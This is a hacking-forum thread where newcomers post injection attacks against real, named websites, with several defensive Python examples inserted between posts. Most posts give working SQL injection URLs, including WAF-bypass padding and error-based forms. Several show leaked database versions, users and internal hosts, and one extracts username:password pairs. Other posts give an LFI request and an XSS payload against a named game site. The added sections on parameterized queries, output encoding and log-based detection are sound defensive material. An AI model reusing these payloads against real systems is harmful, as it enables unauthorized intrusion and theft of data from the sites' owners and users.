SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,363
    Likes Received:
    513
    Reputations:
    20
    This thread is only for publishing vulnerabilities that you found yourself. Every honestly found vulnerability adds to your reputation. The thread is exclusively for newcomers.

    Before posting, check whether the vulnerability you found has already been posted. You can do that like this:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Don't forget that you have to write an exploit with output for SQLi, pop an alert() for XSS, read /etc/passwd for LFI, and so on.

    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
    Mister_Bert0ni likes this.
  2. BabaDook
  3. BabaDook
    Two http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    By the way, there's a WAF here and I used the buffer overflow technique. P.S. I couldn't find any articles on this topic anywhere, and there are very few manuals on WAF bypass and so on.
     
  4. BabaDook
    Three, LFI

    http://greyslon.ru/index.php

    POST
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Also this: http://greyslon.ru/htaccess. I don't know whether reading this file counts as a vulnerability or not.
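The `page=../info` parameter above is a path-traversal style local file include: whatever the request supplies is joined onto a filesystem path and included. As an added example from the defender's side (this is not the poster's code and not the greyslon.ru application), the Python snippet below contrasts an include routine that pastes the parameter straight into the path with one that enforces an identifier allowlist and then a canonical-path check. The directory layout, template names and file contents are constructed for the demo.

```python
import os
import re
import tempfile

# Constructed sandbox for the demo: PAGES holds the only templates that may be
# included; info.tpl sits one level up, standing in for a file the application
# should never serve (no real application files are reproduced here).
BASE = tempfile.mkdtemp()
PAGES = os.path.join(BASE, "pages")
os.makedirs(PAGES)
for name, body in {"register": "register form", "login": "login form"}.items():
    with open(os.path.join(PAGES, name + ".tpl"), "w") as fh:
        fh.write(body)
with open(os.path.join(BASE, "info.tpl"), "w") as fh:
    fh.write("outside")

# Allowlist for page names: a short identifier, so '/', '\\', '.', '%' and NUL
# can never reach the path-building code.
_PAGE_NAME = re.compile(r"^[a-z0-9_-]{1,32}$")


def vulnerable_include(page: str) -> str:
    """The flawed pattern: request data goes straight into the path."""
    with open(os.path.join(PAGES, page + ".tpl")) as fh:
        return fh.read()


def hardened_include(page: str) -> str:
    """Same lookup with two independent checks."""
    if not _PAGE_NAME.match(page):
        raise ValueError("page name rejected by allowlist")
    root = os.path.realpath(PAGES)
    target = os.path.realpath(os.path.join(root, page + ".tpl"))
    # Belt and braces: even a name that passes the regex (or a symlink placed
    # inside PAGES) must canonicalise to a location underneath the page directory.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("resolved path escapes the page directory")
    with open(target) as fh:
        return fh.read()


def is_allowed(page: str) -> bool:
    """True when hardened_include would serve the page, False when it rejects it."""
    try:
        hardened_include(page)
        return True
    except (ValueError, FileNotFoundError):
        return False


if __name__ == "__main__":
    print("vulnerable ../info ->", vulnerable_include("../info"))
    print("hardened register  ->", hardened_include("register"))
    print("hardened ../info   ->", is_allowed("../info"))
```

The allowlist alone would already stop `../info`; the `realpath` comparison is kept because it also catches symlinks inside the page directory and any future change that loosens the regex.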
     
  5. BabaDook
    bidderland.co.in/siteadmin
    This vulnerability can be exploited in 5 seconds.
    It wasn't me who found it, but it's very interesting and not typical. Whoever has figured it out, please keep it secret.
     
    Bezlishke and Mister_Bert0ni like this.
  6. WallHack
    Why didn't you take it further?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Version: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Why make several posts? You can put everything in one.
     
    #6 WallHack, 10 May 2015
    Last edited: 10 May 2015
  7. BigBear
    Develop the vulnerabilities further. Try to come up with an attack vector. We aren't selecting you just so that you can find something.

    Take_IT and yarbabin like this.
  8. frank
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - output in the title

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
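Posts #6 and #8 show the classic union-based injection through a numeric `id` parameter: the request value is concatenated into the query text, so `-1278 union select ...` is executed as a second SELECT whose columns land in the page. As an added example (not code from the forum or from any of the listed sites), the Python/sqlite3 snippet below reproduces the flawed concatenation next to the fix, integer coercion plus placeholder binding, against a constructed in-memory table.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a site's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "Hello", "first post"), (2, "Second", "more text")],
    )
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """The flawed pattern: the raw request parameter is spliced into SQL text,
    so an id of '-1 union select ...' runs as a second SELECT."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def fetch_parameterized(conn: sqlite3.Connection, id_param: str) -> list:
    """The fix: coerce to the expected type, then bind with a placeholder.
    The driver ships the value separately from the statement, so it can only
    ever be compared with the id column, never parsed as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # not a number: refuse rather than guess
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id=?", (id_value,)
    ).fetchall()


# The shape of value seen in the thread, with MySQL's version() swapped for
# SQLite's sqlite_version() so the demo runs offline.
PROBE = "-1 union select 1, sqlite_version(), 3"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", fetch_vulnerable(db, PROBE))     # leaks the DB version
    print("parameterized:", fetch_parameterized(db, PROBE))  # []
    print("legit lookup :", fetch_parameterized(db, "2"))
```

The integer coercion is what makes the rejection visible (an empty result instead of a 500); the binding is what makes the query safe even for string parameters, where coercion is not available.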
     
  9. BabaDook
    Four
    PHP:
    http://tamugaia.com/hiscman/?framed=yes&g=%66%61%6c%73%65%27 %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%75%73%65%72%28%29%2c%76%65%72%73%69%6f%6e%28%29%2c%64%61%74%61%62%61%73%65%28%29%2c%35 %2d%2d%20%20%2d
     
  10. BabaDook
    PHP:
    http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+%20-
    Thanks to faza02 for the hint.
     
  11. frank
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    idserver_damico@winwebs03.cpt.wa.co.za
    idserver_damicodb
    5.5.42-cll
     
  12. Mister_Bert0ni
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -



    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
     
    #12 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
    papaher and BabaDook like this.
  13. Mister_Bert0ni
    An SQLi demonstration from me
     
    Шниперсон and kostea like this.
  14. Mister_Bert0ni
    An SQLi demonstration from me
     
    Шниперсон and Dondo like this.
  15. Mister_Bert0ni
    SQLi on the bitbank site
     
    Шниперсон and Dondo like this.
  16. Mister_Bert0ni
    Yes, yes, 5 seconds is even too much)))
     
  17. rezistor
  18. Arboretum
    http://java.lordy.ru/
    There's a Java game; after registering, you can write "><script>alert(XSS)</script>" in the chat, after which the XSS pops up on java.lordy.ru.
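The chat message above is written into the page without output encoding, so the `"` closes the attribute it lands in and the `<script>` tag becomes live markup. As an added example (not the game's code), the Python functions below place a naive template next to an output-encoded one for the two contexts a chat message typically reaches, a text node and a quoted attribute value, and add a Content-Security-Policy header as a second layer. The templates, the `has_live_script` check and the header set are constructed for the demo; the payload string is the one quoted in the post, used only as a test vector.

```python
import html
import re

# Constructed templates standing in for the chat page's markup.
BODY_TEMPLATE = '<div class="msg">{}</div>'
ATTR_TEMPLATE = '<input type="text" name="last" value="{}">'

# The payload quoted in the post, used here only as a test vector.
SAMPLE_PAYLOAD = '"><script>alert(XSS)</script>'


def render_body_vulnerable(msg: str) -> str:
    """No encoding: '<' and '>' in the message become real tags."""
    return BODY_TEMPLATE.format(msg)


def render_attr_vulnerable(msg: str) -> str:
    """No encoding: the '"' in the message terminates the attribute value."""
    return ATTR_TEMPLATE.format(msg)


def render_body_safe(msg: str) -> str:
    """html.escape turns & < > into entities; the browser renders them as text."""
    return BODY_TEMPLATE.format(html.escape(msg, quote=False))


def render_attr_safe(msg: str) -> str:
    """quote=True additionally encodes double and single quotes, which is
    mandatory inside a quoted attribute value."""
    return ATTR_TEMPLATE.format(html.escape(msg, quote=True))


def security_headers() -> dict:
    """Defence in depth: if an encoding slip does occur, inline script is
    refused by the browser because only same-origin script files are allowed."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


_SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def has_live_script(markup: str) -> bool:
    """Crude detector for the demo: does a real <script opening tag survive?"""
    return _SCRIPT_OPEN.search(markup) is not None


if __name__ == "__main__":
    for fn in (render_body_vulnerable, render_body_safe,
               render_attr_vulnerable, render_attr_safe):
        out = fn(SAMPLE_PAYLOAD)
        print(f"{fn.__name__:24s} live script: {has_live_script(out)}  {out}")
```

Encoding has to match the context: `quote=False` is enough for a text node, but the same message inside an attribute needs the quotes encoded too, which is why the attribute renderer uses `quote=True`.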
     
  19. frank
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    jhewlett_r@209.68.5.201
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    nightgallery20@72.167.232.44
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    austral3_casso@server-2h-r34.ipv4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    novagoraTest@10.0.5.18
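Most of the injection strings in this thread (the versioned-comment and padding trick in post #3, the `extractvalue()` error-based form in post #10, the `floor(rand())` duplicate-key form in the post above, and the plain `union select ... version()` probes in posts #6, #8 and #11) are visible in ordinary web server access logs. As an added example from the detection side (not from any forum poster), the Python scanner below decodes each request target, folds MySQL `/*!...*/` versioned comments back to the text the server would execute, strips ordinary comments, and only then matches keyword rules, so the comment padding that got past the WAF in post #3 does not hide the query from the detector and is itself flagged. The log lines are constructed and use example paths on no real host; the rule names and thresholds are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Apache combined style. The request targets
# mimic the shapes seen in the thread but do not point at any real host.
PADDING = "A" * 200
SAMPLE_LOG = [
    '198.51.100.7 - - [10/May/2015:12:00:01 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/May/2015:12:00:02 +0000] "GET /news.php?id=-1278+union+select+1,2,3,version(),5+--+ HTTP/1.1" 200 3311',
    '198.51.100.9 - - [10/May/2015:12:00:03 +0000] "GET /b.php?sait=-10%27+/*!12345union*/+/*!12345select*/+1,2,database/*'
    + PADDING + '*/(),4+--+ HTTP/1.1" 200 3300',
    '198.51.100.9 - - [10/May/2015:12:00:04 +0000] "GET /index.php?id=100+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+ HTTP/1.1" 500 812',
    '198.51.100.9 - - [10/May/2015:12:00:05 +0000] "GET /event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+ HTTP/1.1" 500 640',
]

_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# /*!12345union*/ : MySQL executes the inner text, so the detector keeps it.
_VERSIONED = re.compile(r"/\*!\d{0,6}\s*(.*?)\*/", re.S)
# /* anything */   : dropped by the SQL parser, so dropped here as well.
_COMMENT = re.compile(r"/\*.*?\*/", re.S)

RULES = {
    "union-select": re.compile(r"\bunion\b.{0,40}?\bselect\b"),
    "error-based-xml": re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "error-based-rand": re.compile(r"\bfloor\s*\(\s*rand\s*\("),
    "db-fingerprint": re.compile(r"\b(?:version|database|user)\s*\(\s*\)|@@\w+"),
}
MAX_COMMENT_LEN = 64  # anything longer is padding, not a comment


def normalize(target: str) -> str:
    """Bring the request target to the form the database would see."""
    s = unquote_plus(unquote_plus(target))  # two passes catch %25-style double encoding
    s = _VERSIONED.sub(r" \1 ", s)
    s = _COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def inspect_target(target: str) -> list:
    """Return the names of every rule the request target triggers."""
    decoded = unquote_plus(target)
    normalized = normalize(target)
    hits = [name for name, rx in RULES.items() if rx.search(normalized)]
    if any(len(c) > MAX_COMMENT_LEN for c in _COMMENT.findall(decoded)):
        hits.append("oversized-comment")
    return hits


def scan_log(lines) -> list:
    """[(request target, [rule names])] for every parsable log line."""
    out = []
    for line in lines:
        m = _REQUEST.search(line)
        if m:
            out.append((m.group(1), inspect_target(m.group(1))))
    return out


if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print("ALERT" if hits else "ok   ", target[:60], hits)
```

The order of the two comment substitutions matters: versioned comments are unfolded first, otherwise the plain-comment rule would erase `/*!12345union*/` and the union rule would never fire. The "oversized-comment" rule is evaluated on the decoded but un-stripped text, because the padding is the signal there.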
     
  20. Zen1T21